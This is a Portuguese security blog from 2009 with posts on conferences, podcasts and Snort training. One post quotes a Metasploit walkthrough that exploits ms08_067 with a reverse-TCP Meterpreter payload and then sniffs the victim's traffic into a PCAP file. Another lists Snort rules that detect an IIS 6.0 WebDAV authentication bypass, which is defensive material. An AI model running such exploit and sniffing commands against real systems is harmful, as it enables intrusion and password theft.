quinta-feira, 3 de dezembro de 2009

Chamada de Trabalhos para o YSTS 4

A chamada de artigos para a conferencia yStS (you Sh0t the Sheriff) está aberta!

A quarta edição irá acontecer novamente em São Paulo, Brasil, no dia
17 de Maio de 2010.

INTRODUCAO

O you sh0t the Sheriff é um evento único, dedicado a mostrar os temas
mais interessantes e atuais relacionados à segurança da informação,
trazendo uma combinação de palestras de alta qualidade com
palestrantes renomados de diversas partes do planeta e cobrindo
diversos tópicos sobre o tema.

Nosso objetivo principal é permitir que os participantes tenham uma
visão do estado atual da segurança no mundo, combinando diferentes
segmentos da área.
O evento é basicamente para convidados, assim sendo, submeter uma
apresentação é certamente uma boa maneira de tentar participar,
principalmente se você reside no Brasil

Em função do sucesso das edições passadas, nós mantivemos o evento no
mesmo formato:

- Ambiente descontraído
- O YSTS 4 vai acontecer em um local secreto (anunciado somente aos
participantes algumas semanas antes do dia da conferencia)
- Novamente o este local secreto será em um aprazível bar ou pub
- E sim, teremos (alguma) comida e (bastante) bebida

TÓPICOS

O foco do YSTS 4 são assuntos relacionados com segurança da
informação, incluindo (mas não limitado a):

* Sistemas operacionais
* Tópicos sobre Gestão e Carreira
* Dispositivos móveis/sistemas embarcados
* Auditoria e controle
* Redes sociais
* Políticas de segurança
* Problemas com protocolos
* Redes/Telecomunicações
* Redes sem fio e Radiofreqüência em geral
* Resposta a incidentes
* Information Warfare
* Guerra de informação
* Código malicioso / BotNets
* Falhas dirigidas a usuários
* Programação segura
* Hacker Spaces / Comunidades hacker
* Fuzzing
* Segurança física
* Virtualização
* Segurança em aplicações WEB
* Computação nas nuvens
* Criptografia / Ofuscação
* Infra-estrutura e sistemas críticos
* Bafômetro hacks
* E qualquer outra coisa relacionada com segurança que você imagine
que seja interessante ser apresentada na conferência

Nós gostamos de palestras curtas, então, por favor, lembre-se que sua
palestra deve caber em no máximo 30 minutos.

Como novidade, este ano nós também aceitaremos palestras de 15 minutos.

Algumas pessoas não precisam de 30 minutos para passa sua mensagem ou
gostariam de falar sobre um projeto recém iniciado. Para estes casos
15 minutos será suficiente.

You sh0t the Sheriff é certamente a conferencia perfeita para lançar
seus projetos novos, confie em nós 
E sim, nós preferimos coisas novas e novos palestrantes são mais que
bem-vindos. Se você tem uma algo bacana para falar, isso é o que
importa.

PRIVILÉGIOS PARA OS PALESTRANTES
(Somente para palestras de 30 minutos)

* R$ 700 para auxilio nas despesas de deslocamento para palestrastes
que residam fora da cidade de São Paulo;
* Café da manha, almoço e jantar durante a conferencia;
* Festa oficial pós-conferencia (e não oficiais também);
* Auditoria de produtos em churrascarias tradicionais;
* Entrada vitalícia para todas as futuras edições da conferencia (Sim,
se você já falou em alguma edição passada do yStS você tem entrada
grátis garantida, pode nos pagar uma cerveja por isso... hmm esqueça,
as bebidas no evento são grátis).

SUBMISSÃO

Cada submissão de palestra deve incluir as seguintes informações:
* Nome, titulo, endereço, email e telefone para contato
* Biografia resumida e qualificações
* Experiência em apresentações
* Sumario ou abstrato da apresentação
* Esta e uma palestra de 15 ou 30 minutos?
* Recursos necessários (Alem do projetor)
* Outras publicações ou conferencias onde este material foi ou será
publicado/submetido

Nos aceitamos submissões em Ingles, Português ou Espanhol

DATAS IMPORTANTES

Data Final para submissão - 28 de Fevereiro 2010 (23:59 - Horário de Brasília)
Notificação das palestras aceitas - 20 de Março 2010
Data Final para envio do material aceito: 5 de Maio 2010

Por favor, envie sua submissão para cfp/at/ysts.org

CONTATOS

Submissão de artigos: cfp/at/ysts.org
Perguntas em gerais: b0ard/at/ysts.org
Questões sobre patrocínio: sponsors/at/ysts.org

COISAS RELACIONADAS

Arquivos de palestras anteriores, incluindo os vídeos, at www.ysts.org

Esperamos vê-lo(a) lá!

OBS: Para quem não conhece, veja como foi a edição 3:
http://www.vimeo.com/6887470

Luiz Eduardo & Nelson Murilo & Willian Caprino
http://ysts.org

sábado, 3 de outubro de 2009

Podcast Nacional - [i shot the sheriff] Edição 69 - 26.09.09

Duração: 1 hora e 5 minutos

Eventos

CFP da H2HC aberto até o dia 5 de outubro

BH DC CFP Open

Nullcon

ShmooCon 2010 CFP is Open

All these pcaps (7GB and 25 million packets) along with the ITOC and Defcon11 datasets are now available at pcapr.net



Noticias

América encabeza lista de envíos de spam

802.11n Wi-Fi standard finally approved

Brasil terá padrão único para RFID

Foiled by Facebook: Would-Be Burglar Jonathan Parker

iPhone Straining AT&T Network

Apple's Sloppy Security Moves

Incidentes do Google (ex. Gmail em 24/09)

Escute em : http://www.naopod.com.br

Happy Hacking!

Rodrigo Montoro(Sp0oKeR)

segunda-feira, 28 de setembro de 2009

AppSec Brasil 2009 - Chamada para participação

Caros,

Amanhã (29/09/2009) começa as inscricões para o AppSec Brasil 2009 .

AppSec Brasil 2009

CHAMADA PARA PARTICIPAÇÃO

Conferência internacional de Segurança de Aplicações, organizada e promovida pela comunidade TI-controle e pelo Centro de Informática da Câmara dos Deputados, em parceria com o OWASP, Capítulo brasil, e com apoio da Universidade de Brasília (UnB).

O Centro de Informática da Câmara dos Deputados e a Comunidade TI-Controle convidam a todos a participarem da Conferência Internacional de Segurança de Aplicações (AppSec Brasil 2009), que ocorrerá na Câmara dos Deputados (Brasília, DF) de 27 a 30 de outubro de 2009.

Haverão mini-cursos nos dias 27 e 28 de outubro, seguidos de sessões plenárias de trilha única nos dias 29 e 30 de outubro de 2009.

Keynotes

Dr. Gary McGraw, CTO da Cigital

O Modelo de Maturidade Building Security In (BSIMM)

Jason Li, Aspect Security

Ágil e Seguro: É possível fazer os dois?

Dinis Cruz, OWASP Board

Apresentação do Projeto OWASP

Kuai Hinojosa, NY University e OWASP

Implementando Aplicações Web Seguras Usando Recursos do OWASP

Palestras

A Conferência contará com palestras técnicas que tratarão diversos aspectos de Segurança de Aplicações. Os temas incluem:

* Segurança de aplicações web
* Otimização de gastos com segurança
* SQL Ownage
* ferramentas.


Mini-cursos

A Conferência contará também com 5 mini-cursos:

* Gestão de Riscos de Segurança Aplicada a Web Services
* Segurança Web: Técnicas para Programação Segura de Aplicações
* Segurança Computacional no Desenvolvimento de Web Services
* Tecnologias de Segurança em Web Services
* Hands on Web Application Testing using the OWASP Testing Guide.

Local

A Conferência ocorrerá na Câmara dos Deputados, em Brasília. As plenárias serão no auditório Nereu Ramos, no Anexo II e os mini-cursos serão no Centro de Formação, Treinamento e Aperfeiçoamento.

Inscrições

A participação na Conferência será gratuita, mas, devido à limitação de lugares, será necessário inscrever-se previamente.

As inscrições estarão abertas a partir do dia 29/09/2009 na URL: http://www.camara.gov.br/appsecbrasil2009

Informações

Para maiores informações, favor consultar os sites abaixo ou enviar email para appsec.brasil@camara.gov.br

Inscrições e informações sobre a conferência: http://www.camara.gov.br/appsecbrasil2009
Comunidade TI-Controle: http://www.ticontrole.gov.br
Câmara dos Deputados: http://www.camara.gov.br

--
If a tree falls in the forest and no one is around to see it, do the other trees make fun of it?
_______________________________________________
Owasp-brazilian mailing list
Owasp-brazilian@lists.owasp.org
https://lists.owasp.org/mailman/listinfo/owasp-brazilian

Nos vemos por lá pessoal =)!

Happy Hacking!

Rodrigo Montoro(Sp0oKeR)

domingo, 13 de setembro de 2009

Nova lista discussão Snort-BR

Migramos a lista =)

Tivemos e estamos com problemas na velha lista do snort-br que fica hospedada no mailling do CIPSGA. Visando a melhoria do grupo e para não termos mais problemas estamos migrando a lista para o grupos do google. Não enviamos convites para todos os ex-membros da outra lista visto que nem todos acreditamos queiram continuar na mesma.

Por favor entrem na nova lista e repassem para os conhecidos que utilizam Snort .

Visite o nosso site e se cadastre :

http://groups.google.com.br/group/snort-brasil?hl=pt-BR

Para se inscrever :

http://groups.google.com.br/group/snort-brasil/subscribe

Obrigado a todos!


Fonte: http://snort.org.br/index.php?option=com_content&task=view&id=88&Itemid=43

Happy Snorting

Rodrigo Montoro(Sp0oKeR)

terça-feira, 1 de setembro de 2009

(IN)SECURE Magazine 22 disponível

Mas uma (IN)SECURE magazine disponivel para download. Excelente revista eletronica com otimo conteudo e free =)!

Nesse release

* Using real-time events to drive your network scans
* The Nmap project: Open source with style
* A look at geolocation, URL shortening and top Twitter threats
* Review: Data Locker
* Making clouds secure
* Top 5 myths about wireless protection
* Securing the foundation of IT systems
* Is your data recovery provider a data security problem?
* Security for multi-enterprise applications
* In mashups we trust?
* AND MORE!

Para baixá-la: http://www.net-security.org/dl/insecure/INSECURE-Mag-22.pdf


Happy Hacking!

Rodrigo Montoro(Sp0oKeR)

segunda-feira, 31 de agosto de 2009

Grade AppSec Brasil 2009 Disponível

Caros,

Algum tempo sem post mas venho atraves desse divulgar a grade do AppSec Brasil que acontecerá em Brasilia.

O Modelo de Maturidade Building Security In (BSIMM) - Gary McGraw, Cigital

Ágil e Seguro: É possível fazer os dois? - Jason Li and Jerry Hoff, Aspect Security

Implementando Aplicações Web Seguras Usando Recursos do OWASP - Kuai Hinojosa, OWASP

Apresentação do projeto OWASP - Dinis Cruz, OWASP

Projetos da OWASP que podem ser utilizados livremente nas organizações - Dinis Cruz

As Camadas Lógica e Semântica da Segurança de Aplicações Web - Thomas Schreiber

O Uso de Web Application Firewalls (WAF) e Sistemas de Database Activity Monitoring (DAM) Para Melhorar a Segurança de Código - Brian Contos

ROI: Otimize os Gastos com Segurança - Matt Tesauro

O Modelo de Maturidade “Software Assurance Maturity Model (SAMM)” - Pravir Chandra

Técnicas Automáticas para “SQL Ownage” - Sebastian Cufre

Praticas e ferramentas fundamentais para o desenvolvimento de software seguro - Cássio Goldschmidt

Abordagem Preventiva para Teste de Segurança em Aplicações Web - Luiz Otávio Duarte, Ferrucio de Franco Rosa e Walcir M. Cardoso Jr.

ModSecurity, Firewall de Aplicação Web Open Source - Klaubert Herr da Silveira

Programação Segura utilizando Análise Estática - Philippe Sevestre


Grade com resumo das palestras: http://www.owasp.org/index.php/AppSec_Brasil_2009_(pt-br)#tab=Resumos_das_Palestras

Eu estarei certamente por lá. Alguém vai ? =)

Happy Hacking!

Rodrigo Montoro(Sp0oKeR)

segunda-feira, 13 de julho de 2009

Metasploit - Meterpreter Sniffer module

Adicionaram uma função fantastica para o meterpreter do metasploit =)! Com certeza isso da um potencial imenso para roubo de senhas plain-text e valoriza ainda mais o uso de criptografia em todos os protocolos https, imaps, pop3s, ssh e demais necessidade .


I committed a test version of the sniffer extension to the SVN trunk. The module in SVN is compiled with debug support, so you should see lots of verbose debug prints if you attach a debugger to the process where meterpreter is running. I could use some help testing this new extension; so far it looks like there are some cases where the "use sniffer" command fails (exploiting ms03-026 on win2003 sp0), but there may be others as well.


To obtain the latest version of Metasploit on UNIX platforms:
$ svn co https://metasploit.com/svn/framework3/trunk/

To obtain the latest version of Metasploit on Windows:
1. Download https://metasploit.com/framework-3.3-dev.exe
2. Execute this and extract the framework to a directory
3. Inside the extracted directory execute msfupdate.bat
4. Inside the extracted directory execute msfconsole.bat

This module uses the MicroOLAP (commercial) Packet Sniffer SDK (we have a license), it can sniff packets from the target system without writing to the filesystem or installing any drivers. The module automatically excludes its own control traffic from the packet capture. As of this week, all Meterpeter communication is now protected by TLS/SSL, including the packet sniffer data.

To get started with the new module:

msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpeter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.0.139
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.120
msf exploit(ms08_067_netapi) > exploit

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Triggering the vulnerability...
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (205824 bytes)
[*] Meterpreter session 1 opened (192.168.0.139:4444 -> 192.168.0.120:1687)

meterpreter > use sniffer
Loading extension sniffer...success.

meterpreter > help
[snip]
Sniffer Commands
================

Command Description
------- -----------
sniffer_dump Retrieve captured packet data
sniffer_interfaces List all remote sniffable interfaces
sniffer_start Capture packets on a previously opened interface
sniffer_stats View statistics of an active capture
sniffer_stop Stop packet captures on the specified interface

meterpreter > sniffer_interfaces

1 - 'VMware Accelerated AMD PCNet Adapter' ( type:0 mtu:1514 usable:true dhcp:true wifi:false )

meterpreter > sniffer_start 1
[*] Capture started on interface 1 (200000 packet buffer)

meterpreter > sniffer_dump 1 /tmp/all.cap
[*] Dumping packets from interface 1...
[*] Wrote 6 packets to PCAP file /tmp/all.cap

meterpreter > sniffer_dump 1 /tmp/all.cap
[*] Dumping packets from interface 1...
[*] Wrote 31 packets to PCAP file /tmp/all.cap

The sniffer_dump command will append to an existing PCAP or create a new one.

-HD


Cuidado com suas senhas trafegas em plain-text =)!

Happy Hacking!

Rodrigo Montoro(Sp0oKeR)

terça-feira, 7 de julho de 2009

OWASP AppSec Brasil 2009 – CFP Deadline

Pessoal,

Estou retornando a ativa no blog, tive alguns eventos do qual preciso postar, também correria na N-Stalker/Dynsec bem como alguns researches por vir.

Nesse post venho falar da ultima semana do CFP do AppSec Brasil que será realizado em Brasilia.

Estamos na última semana para submissão de propostas de palestras para o AppSec Brasil 2009. Mais informações na página do evento: http://www.owasp.org/index.php/AppSec_Brasil_2009_(pt-br)

Ajudem-nos a espalhar o CFP e a solicitar o envio de propostas interessantes para o evento.

Enviei suas propostas, a viagem e estadia será totalmente custeada pela organização, alem de divulgar seu conhecimento, fara networking bem como palestras sempre abrem portas.

Happy Hacking!

Rodrigo Montoro(Sp0oKeR)

sexta-feira, 5 de junho de 2009

Podcast Segurança Nacional - [i shot the sheriff] Edição 66 - 04.06.09

1 hora e pouquinho de duracao

Eventos

ACSAC 2009 submissions due June 8 and June 10 (extended)

FRHACK 2009 Final Call For Papers extended

BugCON '09 has swine influenza!!

YSTS updates



Noticias

China installs a secure operating system on all military PCs

Google Experiments with Image Orientation CAPTCHA

Los 10 que no quieren estar en Google

5 IT security pet peeves

Para ouvir este e os 65 anteriores visite : http://www.naopod.com.br

YSTS v3.0 - http://www.ysts.org

Happy Hacking e nos vemos no YSTS .

Rodrigo Montoro(Sp0oKeR)

quinta-feira, 4 de junho de 2009

[Evento] GTER/GTS em São Paulo

Caros,

Quem não conhece o registro.br organiza o GTER e GTS com boas palestras e de forma gratuita. Esse ano teremos as seguintes palestras:

GTER

08:00 - 08:50 Recepção
08:50 - 09:00 Abertura

09:00 - 10:00 VoIP Completo
Julião Braga, TeleSA

10:00 - 10:30 Controlando tráfego de trânsito em um AS
Ana Lúcia de Faria, Cisco

10:30 - 11:00 Coffee Break

11:00 - 11:40 Rastreando fluxos para detecção de eventos em redes
Jorge Luiz Correa e André Proto. UNESP

11:40 - 12:30 Duplo acesso de "pobre" (Poor man's dual homing)
Danton Nunes, InterNexo

12:30 - 14:00 Almoço

14:00 - 15:00 Carrier Grade NAT
Igor Giangrossi, Cisco

15:00 - 17:50 Análise de Vulnerabilidades de Redes em Conexões com PTT
Eduardo Ascenço Reis, NIC.br

15:50 - 16:20 Coffee Break

16:10 - 17:20 Entendendo ASNs BGP de 4 bytes
André Gustavo Albuquerque, Cisco

17:20 - 18:10 DNSSHIM - DNSSEC automatizado
Cesar Henrique Keiti Kuroiwa, David Robert Camargo Campos e Mauro Romano Trajber, NIC.br


GTS

08:00 - 08:50 Recepção
08:50 - 09:00 Abertura

09:00 - 09:40 Ataques contra o SMTP - Como as botnets enviam spam
Miguel Di Ciurcio Filho, Unicamp

09:40 - 10:20 Malware Patrol - Os desafios de coletar e monitorar
URLs que apontam para Malwares
Andre Correa, Malware Patrol

10:20 - 10:50 Coffee Break

10:50 - 11:30 O Crime Cibernético contra as Leis: o cenário da
América Latina
Anchises M. G. de Paula, VeriSign Brasil

11:30 - 12:20 Desafios na criação de um CSIRT distribuído
Karina M. Queiroz, TIVIT

12:20 - 14:00 Almoço

14:00 - 14:30 Honeynets: Automatizando a restauração de Honeypots de
alta interatividade
Luiz Otávio Duarte, Renato Yuzo Madokoro e Ricardo Makino,
CTI / MCT

14:30 - 15:10 O que interessa não é o Servidor Web
Luiz Eduardo Dos Santos, Imperva, Inc.

15:10 - 15:50 Processo de Gestão de Identidades com uso de biometria
por impressão digital
Jorilson Rodrigues, DPF / Ministério da Justiça

15:50 - 16:20 Coffee Break

16:20 - 17:00 GATI - Tratamento de Incidentes de Segurança no MJ e DPF
Ivo de Carvalho Peixinho e Jorilson da Silva Rodrigues,
Departamento de Polícia Federal

17:00 - 17:40 Um ano do Catálogo de Fraudes RNP - Números, tendências
e próximos passos
Ronaldo Castro de Vasconcellos, CAIS / RNP

17:40 - 17:50 Encerramento


Para se inscrever e mais informações: http://gter.nic.br/reunioes/gter-27


Estarei lá no GTS =)!

Happy Hacking!

Rodrigo Montoro(Sp0oKeR)

segunda-feira, 1 de junho de 2009

(IN)Secure Magazine Issue 21 released!

A (In)Secure magazine sempre vem com otimos artigos e em formato eletronico free.


* Malicious PDF: Get owned without opening
* Review: IronKey Personal
* Windows 7 security features: Building on Vista
* Using Wireshark to capture and analyze wireless traffic
* "Unclonable" RFID - a technical overview
* Secure development principles
* Q&A: Ron Gula on Nessus and Tenable Network Security
* Establish your social media presence with security in mind
* A historical perspective on the cybersecurity dilemma
* A risk-based, cost effective approach to holistic security
* AND MORE!

Para baixar: http://www.net-security.org/insecuremag.php


Happy Hacking!

Rodrigo Montoro(Sp0oKeR)

domingo, 24 de maio de 2009

YSTS 3 - Grade, Concurso e Treinamentos

Amigos,

Sou suspeito para falar pois apoio o You Shot The Sheriff, mas desde o primeiro ano vi a evolução do evento, e os dois primeiros foram animais, esse então a previsão é que detone. A grade foi lançada e ainda estão com uma promoção para concorrerem a um ingresso!!


1) CONCURSO CULTURAL:

Você já pediu um convite para o YSTS 3 com nossos patrocinadores e ninguem te atendeu ?
Você pensou em comprar com cartão mas o crédito está estourado ?
Você quer muito ir nessa conferência mas não sabe como ?

Seus problemas acabaram !

Escreva uma frase que será estampada na camiseta oficial do evento e envie para camiseta30@ysts.org até quarta, 27/05/2009.

A melhor frase ganha, inteiramente grátis, um passaporte (pessoal e intransferível) para a conferencia de segurança mais badalada do Brasil, que ocorrerá em um Bar na cidade de Sao Paulo durante o dia 22 de junho de 2009. Além disso, receberá um convite para festa VIP que ocorre no dia 23 de junho em outro bar (beba com moderação nos dois dias, hehehe).

As frases devem ter temas "geek",de preferencia em portugues. Seguem alguns exemplos:

"There's no place like 127.0.0.1"
"Bow before me, for I am root."
"No, I will not fix your computer"

Envie logo a sua frase. Aceitaremos submissões até esta quarta, 27 de maio.


2) TREINAMENTOS:

Não perca, esse ano teremos 4 treinamentos. Garanta logo a sua vaga acessando o link "inscrições" em www.ysts.org:

Introdução a Engenharia Reversa, com Luis Miras, pesquisador de segurança independente e co-autor do livro "Reverse Engineering Code with IDA Pro" (Syngress/2008).

Dismistificando Segurança em Wireless, com Luiz Eduardo e Nelson Murilo. Aprenda, com histórias da vida real, não só quebrar, mas como montar uma rede robusta.

Internet Hacking Techniques, com Felipe Balestra (parceria Conviso)

Web Hacking Techniques, com Wagner Elias (parceria Conviso)


3) GRADE:

Veja em www.ysts.org a agenda oficial do evento, que contará com as palestras a seguir, muitas delas inéditas e programadas para serem apresentadas também nas conferencias Defcon e Blackhat USA. Você vê antes, aqui no Brasil e com tradução simultânea.:

Policy - The Biscuit Game of Infosec, Jim O’Gorman

Behind the Curtain – the Microsoft Security Response Process explained, Mike Reavey: Director, MSRC

w3af - A framework to own the web, Andrés Riancho

Profiling Modern Hybrids & Threats , Derek Manky

Attacking Mobile Phone Messaging, Luis Miras e Zane Lackey

Hackeando do banheiro, Bruno Gonçalves de Oliveira

RIA Risks (Rich Internet Applications), Kevin Stadmeyer e Jon Rose

Reverse engineering and auditing extensible Microsoft subsystems and subsequent 3rd party implementations., Aaron Portnoy, DVLabs

Como Transformar uma Abotoadura em um Boné (Porque os gestores devem olhar de perto os controles técnicos de segurança), Eduardo V. C. Neves

Segurança e técnicas de intrusão em ambiente Oracle, Wendel Guglielmetti Henrique



Grato e nos vemos lá !


Willian Caprino, Nelson Murilo e Luiz Eduardo
www.ysts.org
www.naopod.com.br

Boa sorte para quem enviar a frase e quem for nos encontramos por lá! =)

Happy Hacking!

Rodrigo Montoro

quarta-feira, 20 de maio de 2009

Snort contra nova falha IIS 6.0 / Webdav

Saiu recentemente uma falha que permiter a elevação de privilegio ou simplesmente um bypass na autenticação do Webdav como o Bruno Gonçalves fez um otimo post no seu BLOG http://g0thacked.wordpress.com/2009/05/15/0day-bypassing-remote-webdav-auth-iis-6-0/ .

Muito se comentou da proteção sobre a falha com regras do Snort e o pessoal do Emerging Threats está testando várias opções como a citada abaixo:

alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"IIS6.0 WebDav Remote
Auth Bypass - GET METHOD"; content:"Translate:"; nocase;
pcre:"/GET.*%..%.*HTTP/Bi"; pcre:"/Translate: *f/i";
reference:url,isc.sans.org/diary.html?storyid=6397;sid:1000004;
rev:1;)

Sinceramente não testei essa regra e nao sei se o consumo de performance com 2 pcre ira causar.

No site do VRT da Sourcefire simplesmente sugeriram adicionar no pré-processador de http (http_inspect) o monitoramento de ascii ou utf_8 como podem ver em http://vrt-sourcefire.blogspot.com/2009/05/snort-protection-against-iis-60-webdav.html

UPDATE:

O VRT postou a pouco as regras abaixo para detecção:

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB-IIS Microsoft IIS 6.0 WebDAV COPY remote authentication bypass attempt"; flow:to_server,established; content:"COPY"; http_method; pcre:"/^COPY\s+[^\x0a]*?(\x25[89A-F][0-9A-F])/si"; reference:url,www.microsoft.com/technet/security/advisory/971492.mspx; reference:cve,2009-1676; classtype:attempted-user; sid:1; rev:1;)

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB-IIS Microsoft IIS 6.0 WebDAV PROPFIND remote authentication bypass attempt"; flow:to_server,established; content:"PROPFIND"; http_method; pcre:"/^PROPFIND\s+[^\x0a]*?(\x25[89A-F][0-9A-F])/si"; reference:url,www.microsoft.com/technet/security/advisory/971492.mspx; reference:cve,2009-1676; classtype:attempted-user; sid:2; rev:1;)

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB-IIS Microsoft IIS 6.0 WebDAV PROPPATCH remote authentication bypass attempt"; flow:to_server,established; content:"PROPPATCH"; http_method; pcre:"/^PROPPATCH\s+[^\x0a]*?(\x25[89A-F][0-9A-F])/si"; reference:url,www.microsoft.com/technet/security/advisory/971492.mspx; reference:cve,2009-1676; classtype:attempted-user; sid:3; rev:1;)

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB-IIS Microsoft IIS 6.0 WebDAV MKCOL remote authentication bypass attempt"; flow:to_server,established; content:"MKCOL"; http_method; pcre:"/^MKCOL\s+[^\x0a]*?(\x25[89A-F][0-9A-F])/si"; reference:url,www.microsoft.com/technet/security/advisory/971492.mspx; reference:cve,2009-1676; classtype:attempted-user; sid:4; rev:1;)

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB-IIS Microsoft IIS 6.0 WebDAV MOVE remote authentication bypass attempt"; flow:to_server,established; content:"MOVE"; http_method; pcre:"/^MOVE\s+[^\x0a]*?(\x25[89A-F][0-9A-F])/si"; reference:url,www.microsoft.com/technet/security/advisory/971492.mspx; reference:cve,2009-1676; classtype:attempted-user; sid:5; rev:1;)

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB-IIS Microsoft IIS 6.0 WebDAV LOCK remote authentication bypass attempt"; flow:to_server,established; content:"LOCK"; http_method; pcre:"/^LOCK\s+[^\x0a]*?(\x25[89A-F][0-9A-F])/si"; reference:url,www.microsoft.com/technet/security/advisory/971492.mspx; reference:cve,2009-1676; classtype:attempted-user; sid:6; rev:1;)

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB-IIS Microsoft IIS 6.0 WebDAV UNLOCK remote authentication bypass attempt"; flow:to_server,established; content:"UNLOCK"; http_method; pcre:"/^UNLOCK\s+[^\x0a]*?(\x25[89A-F][0-9A-F])/si"; reference:url,www.microsoft.com/technet/security/advisory/971492.mspx; reference:cve,2009-1676; classtype:attempted-user; sid:7; rev:1;)


alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB-IIS Microsoft IIS 6.0 WebDAV DAV remote authentication bypass attempt"; flow:to_server,established; content:"DAV"; http_header; nocase; pcre:"/^[A-Z]+\s+[^\x0a]*?(\x25[89A-F][0-9A-F])/si"; reference:url,www.microsoft.com/technet/security/advisory/971492.mspx; reference:cve,2009-1676; classtype:attempted-user; sid:8; rev:1;)

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB-IIS Microsoft IIS 6.0 WebDAV Destination remote authentication bypass attempt"; flow:to_server,established; content:"Destination"; http_header; nocase; pcre:"/^[A-Z]+\s+[^\x0a]*?(\x25[89A-F][0-9A-F])/si"; reference:url,www.microsoft.com/technet/security/advisory/971492.mspx; reference:cve,2009-1676; classtype:attempted-user; sid:9; rev:1;)

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB-IIS Microsoft IIS 6.0 WebDAV Depth remote authentication bypass attempt"; flow:to_server,established; content:"Depth"; http_header; nocase; pcre:"/^[A-Z]+\s+[^\x0a]*?(\x25[89A-F][0-9A-F])/si"; reference:url,www.microsoft.com/technet/security/advisory/971492.mspx; reference:cve,2009-1676; classtype:attempted-user; sid:10; rev:1;)

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB-IIS Microsoft IIS 6.0 WebDAV If remote authentication bypass attempt"; flow:to_server,established; content:"If"; http_header; nocase; pcre:"/^[A-Z]+\s+[^\x0a]*?(\x25[89A-F][0-9A-F])/si"; reference:url,www.microsoft.com/technet/security/advisory/971492.mspx; reference:cve,2009-1676; classtype:attempted-user; sid:11; rev:1;)

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB-IIS Microsoft IIS 6.0 WebDAV Lock-Token remote authentication bypass attempt"; flow:to_server,established; content:"Lock-Token"; http_header; nocase; pcre:"/^[A-Z]+\s+[^\x0a]*?(\x25[89A-F][0-9A-F])/si"; reference:url,www.microsoft.com/technet/security/advisory/971492.mspx; reference:cve,2009-1676; classtype:attempted-user; sid:12; rev:1;)

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB-IIS Microsoft IIS 6.0 WebDAV Overwrite remote authentication bypass attempt"; flow:to_server,established; content:"Overwrite"; http_header; nocase; pcre:"/^[A-Z]+\s+[^\x0a]*?(\x25[89A-F][0-9A-F])/si"; reference:url,www.microsoft.com/technet/security/advisory/971492.mspx; reference:cve,2009-1676; classtype:attempted-user; sid:13; rev:1;)

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB-IIS Microsoft IIS 6.0 WebDAV Timeout remote authentication bypass attempt"; flow:to_server,established; content:"Timeout"; http_header; nocase; pcre:"/^[A-Z]+\s+[^\x0a]*?(\x25[89A-F][0-9A-F])/si"; reference:url,www.microsoft.com/technet/security/advisory/971492.mspx; reference:cve,2009-1676; classtype:attempted-user; sid:14; rev:1;)

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB-IIS Microsoft IIS 6.0 WebDAV Translate remote authentication bypass attempt"; flow:to_server,established; content:"Translate"; http_header; nocase; pcre:"/^[A-Z]+\s+[^\x0a]*?(\x25[89A-F][0-9A-F])/si"; reference:url,www.microsoft.com/technet/security/advisory/971492.mspx; reference:cve,2009-1676; classtype:attempted-user; sid:15; rev:1;)

Sobre o post: http://vrt-sourcefire.blogspot.com/2009/05/rules-to-detect-iis-60-webdav-exploit.html

FIM UPDATE

Mais sobre a falha com excelente explicação em: http://blog.zoller.lu/2009/05/iis-6-webdac-auth-bypass-and-data.html

Se voce usa IIS com Webdav além do update o monitoramento é muito importante sempre.

Happy Snorting!

Rodrigo Montoro(Sp0oKeR)

quinta-feira, 30 de abril de 2009

[FUN] Snort contra a gripe suina

Minha amiga e ex-colega de trabalho Marcela Daniotti fez uma montagem excelente do nosso querido mascote do snort.



Valeu Marcela!! Merece um post hehehe!

Happy Snorting!

Rodrigo Montoro(Sp0oKeR)

segunda-feira, 27 de abril de 2009

Treinamento Completo snort em português

Caros,

A Dynsec (http://www.dynsec.com.br - empresa do qual sou sócio) , empresa especializada em Detecção de Intrusos, vem através desse comunicar o lançamento do treinamento não oficial sobre Snort IDS. O treinamento acontecerá em parceria com a CLM (http://www.clm.com.br), distribuidora exclusiva da Sourcefire no Brasil. O treinamento será baseado na versão atual do PDF do snort.org, visando manter a qualidade e o caráter atual do curso.

Público Alvo:
- Estudantes
- Administradores de Redes
- Analistas de Segurança

Carga horária: 40 horas

Estão inclusos no curso:
- Manual impresso Snort
- Slides do treinamento para anotações
- Material para laboratório hands-on
- Coffee Break

Local: CLM – Av. Ibirapuera, 2120, cj 95 – São Paulo – SP
Data: 15 a 19 de junho
Horário: 09:00 as 18:00

Maiores informações: http://blog.dynsec.com.br/2009/04/26/treinamento-completo-snort/

Happy Snorting!

Rodrigo Montoro(Sp0oKeR)

quinta-feira, 9 de abril de 2009

Upgrade OBRIGATÓRIO para Snort 2.8.4

Caros,

Acredito que muitos utilizem snort e mantenham as regras atualizadas com as regras do VRT. Como postei anteriormente (http://spookerlabs.blogspot.com/2009/02/novo-pre-processador-dcerpc2-e-ruleset.html) a Sourcefire visando melhorar desempenho e capacidade de detecção de problemas de smb/dcerpc/netbios lançou o novo pré processador dcerpc v2 ou dcerpc2.

Como citado no outro post com vários links ele diminuira muito a quantidade de regras de netbios porém ele terá mais complexibilidade de configuração e o metodo de escrita de regras será um pouco diferente.

